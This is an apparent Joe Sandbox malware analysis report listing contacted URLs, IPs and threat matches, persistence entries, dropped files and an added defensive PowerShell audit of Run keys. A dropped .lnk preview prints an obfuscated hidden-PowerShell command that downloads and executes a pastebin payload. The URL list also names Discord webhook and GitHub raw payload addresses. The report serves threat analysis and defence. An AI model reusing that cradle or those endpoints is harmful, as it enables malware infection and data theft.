https://go.micro | powershell.exe, 00000004.00000002.1812665851.0000000004BE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txtP | powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.11.dr | false | URL Reputation: safe | unknown
https://discord.com/ | powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://discord.com | powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt-usebasi | powershell.exe, 00000004.00000002.1812613044.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1820569925.000000000740C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812227809.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtpowershell | Lm9IJ4r9oO.exe | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtn | Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/ | Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://0.discor | powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com | powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://contoso.com/ | powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E48FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT | powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll | powershell.exe, 00000004.00000002.1812665851.0000000004639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://0.discord.com/ | powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pastebin.com | powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E62C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E46FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pastebin.com | powershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | | 13335 | CLOUDFLARENETUS | true
162.159.138.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | true
185.199.110.133 | unknown | Netherlands | | 54113 | FASTLYUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534109
Start date and time: 2024-10-15 15:53:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Lm9IJ4r9oO.exe
renamed because original name is a hash value
Original Sample Name: 23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@26/26@5/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 76%
                                                                            • Number of executed functions: 396
                                                                            • Number of non-executed functions: 55
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, watson.events.data.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollectorcommon.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Lm9IJ4r9oO.exe
Time | Type | Description
09:54:08 | API Interceptor | 300x Sleep call for process: powershell.exe modified
09:54:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
15:54:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
15:54:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
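The persistence recorded above is a Run value in the user hive whose command is not an executable but a .lnk shortcut dropped under C:\ProgramData, written under both the HKCU and HKCU64 views. The following PowerShell audit is an added example for hunting that pattern on a suspect host; it is not part of the Joe Sandbox report or of the sample. The key list, the "suspicious" rules (.lnk target, ProgramData location, the value name seen in this report) and the function name are assumptions for illustration. It reads the shortcut with WScript.Shell to expose what the .lnk would launch without executing it.

```powershell
# Added example (not from the report): flag HKCU Run/RunOnce entries that launch a
# .lnk shortcut or live under ProgramData, the pattern this sample used with the
# value "OneDrive File Sync" -> "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".
# Key paths, rule set and function name are illustrative assumptions.
function Get-SuspiciousRunEntry {
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # PowerShell provider metadata properties returned by Get-ItemProperty; not registry values
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $shell = New-Object -ComObject WScript.Shell

    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $providerProps) { continue }
            $value = [string]$p.Value

            # Recover the launched path: a quoted path keeps its spaces; otherwise take the
            # first token (heuristic: unquoted paths containing spaces are not handled).
            $target = ($value -replace '^"([^"]+)".*$', '$1').Trim()
            if ($target -eq $value) { $target = ($value -split ' ')[0] }

            $reasons = @()
            if ($target -match '\.lnk$') {
                $reasons += 'launches a .lnk shortcut'
                if (Test-Path -LiteralPath $target) {
                    # CreateShortcut on an existing .lnk loads it; nothing is executed.
                    $lnk = $shell.CreateShortcut($target)
                    $reasons += "shortcut resolves to: $($lnk.TargetPath) $($lnk.Arguments)".Trim()
                } else {
                    $reasons += 'shortcut file missing on disk'
                }
            }
            if ($target -match '^C:\\ProgramData\\') { $reasons += 'lives under ProgramData' }
            if ($p.Name -eq 'OneDrive File Sync') { $reasons += 'value name matches this report' }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Key    = $key
                    Name   = $p.Name
                    Value  = $value
                    Reason = ($reasons -join '; ')
                }
            }
        }
    }
}

Get-SuspiciousRunEntry | Format-Table -AutoSize -Wrap
```

Run it in the context of the user whose hive is suspect (HKCU is per user). A hit whose shortcut resolves to powershell.exe with a download cradle corroborates the "Powershell creates an autostart link" signature; a hit whose .lnk is missing on disk still matters, since the Run value itself is the persistence artifact to remove.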
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
162.159.138.232 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | -
162.159.138.232 | OSLdZanXNc.exe | malicious | Unknown | -
162.159.138.232 | steamcodegenerator.exe | malicious | Unknown | -
162.159.138.232 | cr_asm.ps1 | malicious | Unknown | -
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown | -
162.159.138.232 | SecuriteInfo.com.Python.Muldrop.18.50.31694.exe | malicious | Blank Grabber | -
162.159.138.232 | Exela(1).exe | malicious | Exela Stealer, Python Stealer | -
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | -
162.159.138.232 | http://relay.csgoze520.com/ | malicious | Unknown | -
162.159.138.232 | https://hkdiscord.antsoon.com/ | malicious | Unknown | -
185.199.110.133 | cr_asm_crypter.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.110.133 | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
raw.githubusercontent.com | OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | gaber.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | steamcodegenerator.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureLog Stealer | 185.199.108.133
discord.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
discord.com | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
discord.com | BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
discord.com | gaber.ps1 | malicious | Unknown | 162.159.137.232
discord.com | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
discord.com | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.137.232
pastebin.com | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
pastebin.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
pastebin.com | OSLdZanXNc.exe | malicious | Unknown | 104.20.4.235
pastebin.com | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235
pastebin.com | gaber.ps1 | malicious | Unknown | 104.20.4.235
pastebin.com | cr_asm_crypter.ps1 | malicious | Unknown | 104.20.4.235
pastebin.com | steamcodegenerator.exe | malicious | Unknown | 172.67.19.24
pastebin.com | cr_asm.ps1 | malicious | Unknown | 172.67.19.24
pastebin.com | xc.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
pastebin.com | w0QdNGUNtd.exe | malicious | RedLine | 104.20.3.235
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
CLOUDFLARENETUS | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
CLOUDFLARENETUS | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
CLOUDFLARENETUS | gaber.ps1 | malicious | Unknown | 162.159.137.232
CLOUDFLARENETUS | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
CLOUDFLARENETUS | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
CLOUDFLARENETUS | https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m- | malicious | Unknown | 162.159.134.42
FASTLYUS | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
FASTLYUS | OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
FASTLYUS | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
FASTLYUS | gaber.ps1 | malicious | Unknown | 185.199.108.133
FASTLYUS | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
FASTLYUS | steamcodegenerator.exe | malicious | Unknown | 185.199.111.133
FASTLYUS | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
FASTLYUS | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 151.101.1.229
FASTLYUS | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
FASTLYUS | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | OSLdZanXNc.exe | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_crypter.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | steamcodegenerator.exe | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | na.hta | malicious | Cobalt Strike, Remcos | 104.20.3.235, 162.159.138.232, 185.199.110.133, 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | steamcodegenerator.exe | malicious | Unknown | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | Factura.exe | malicious | GuLoader, Snake Keylogger | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | Prximos VencimientosPDF.exe | malicious | FormBook, GuLoader | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | dg_official01.exe | malicious | GuLoader | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | doc-Impostos.cmd | malicious | Unknown | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | 9evHLnwull.exe | malicious | Vidar | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | Proforma_InvoicePDF.exe | malicious | FormBook, GuLoader | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | Request for Quotation MK FMHS.RFQ.10.24.vbs | malicious | GuLoader, Snake Keylogger | 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | Request for Quotation MK FMHS.RFQ.10.24.vbs | malicious | GuLoader, Snake Keylogger | 185.199.111.133
                                                                                                No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
Preview: L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0022354517476522
Encrypted: false
SSDEEP: 96:BiHeFnNashhqBoI7R+6tQXIDcQvc6QcE2cw3MO+HbHg/8BRTf3nF1zWOy4lOY+mg:DVNanQ0BU84/jDhhGSuiFlH4IO8q
MD5: B07C9FEA8300A2BBC62320B43840870B
SHA1: 55183B2934657E735EEA27FB1C33A9A53A118F3C
SHA-256: 2C91D6C16AC1133C06001D25F2CCDDCAF6367E28F3E86F7F2C980E31BE8B3ECF
SHA-512: FA01CBB005ADAB0F17BCDA4247C23FA4861011A3DDE650AA730F3DD7588DE59C0C48F48A91F0CE5B80F7D705ADA941ED27AAF792CAE88214BE51883AAB485AE2
Malicious: true
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.4.7.4.0.5.2.5.1.4.7.3.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.4.7.4.0.5.3.3.8.9.7.3.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.b.9.4.a.1.0.-.6.6.3.8.-.4.a.e.8.-.9.f.c.5.-.3.f.2.4.0.e.2.4.2.1.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.1.7.b.6.c.6.-.5.3.6.c.-.4.a.e.d.-.a.3.2.a.-.3.c.5.2.0.6.8.2.a.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.m.9.I.J.4.r.9.o.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.f.c.-.0.0.0.1.-.0.0.1.5.-.f.8.a.9.-.3.4.b.3.0.9.1.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.9.3.a.4.1.e.2.a.b.1.b.e.6.7.4.f.1.6.8.c.0.c.3.7.a.0.e.7.a.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.c.5.1.7.b.f.5.6.9.3.4.7.5.9.9.f.e.8.4.8.c.3.f.c.9.3.8.1.f.6.d.a.f.3.f.9.e.c.7.1.!.L.m.9.I.J.4.r.9.o.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Tue Oct 15 13:54:13 2024, 0x1205a4 type
Category: dropped
Size (bytes): 119243
Entropy (8bit): 1.8652519017129456
Encrypted: false
SSDEEP: 384:d8rD0lRxoZJ20CEM3Rhw8OXzYI/LRkJw0ytfS1k+tp:dC0lRxoZo0CEGRhBOXLUw0efSb3
MD5: 181632455AA6FFFFE5A37503AB788FD0
SHA1: 2C6691F899821A3F5D5D5724B968CC94FAD0523A
SHA-256: 14BD01903B691820D686C0AAE7A534329CD71CC454A60E3BE36386F6E8603B5C
SHA-512: 4C10364347F6B4B7E0D856BDA71685064C8C8E1F0E734757B26C96C430556B9A1063AC6AC3851BDFEBD7BE9720EDF8B55915584400018A01DC01B0143FA8C32D
Malicious: false
Preview: MDMP..a..... ........t.g.........................................K..........T.......8...........T............K..............,!...........#..............................................................................eJ.......#......GenuineIntel............T............s.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
